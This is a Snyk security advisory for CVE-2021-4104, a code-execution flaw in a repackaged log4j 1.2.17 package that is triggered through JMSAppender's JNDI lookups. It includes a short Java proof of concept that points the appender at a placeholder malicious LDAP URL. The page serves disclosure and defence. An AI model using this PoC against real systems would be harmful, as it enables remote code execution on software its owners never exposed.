Arbitrary Code Execution Affecting org.zenframework.z8.dependencies.commons:log4j-1.2.17 package, versions [0,]


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
15.91% (97th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Arbitrary Code Execution vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JAVA-ORGZENFRAMEWORKZ8DEPENDENCIESCOMMONS-5922119
  • published13 Dec 2021
  • disclosed10 Dec 2021
  • creditUnknown

Introduced: 10 Dec 2021

CVE-2021-4104  (opens in a new tab)
CWE-94  (opens in a new tab)

How to fix?

There is no fixed version for org.zenframework.z8.dependencies.commons:log4j-1.2.17.

Overview

Affected versions of this package are vulnerable to Arbitrary Code Execution.
Note: Even though this vulnerability appears to be related to the log4j 2.x vulnerability, the 1.x branch of the module requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.

In order to leverage this vulnerability the following conditions must be met:

  1. The application has enabled JMSAppender (or a class that extends JMSAppender)
  2. The attacker has access to directly modify the TopicBindingName or TopicConnectionFactoryBindingName configuration variables - which is an unlikely scenario

If these conditions are met, log4j 1.x allows a lookup feature that does not protect against attacker-controlled LDAP and other JNDI related endpoints. Therefore, an attacker with access to the aforementioned configuration variables is able to execute arbitrary code when loaded from an LDAP server.

PoC

import org.apache.log4j.net.JMSAppender;
// ...
JMSAppender a = new JMSAppender();
a.setTopicConnectionFactoryBindingName("ldap://<malicious-url>");
// OR a.setTopicBindingName("ldap://<malicious-url>");
a.activateOptions();

CVSS Scores

version 3.1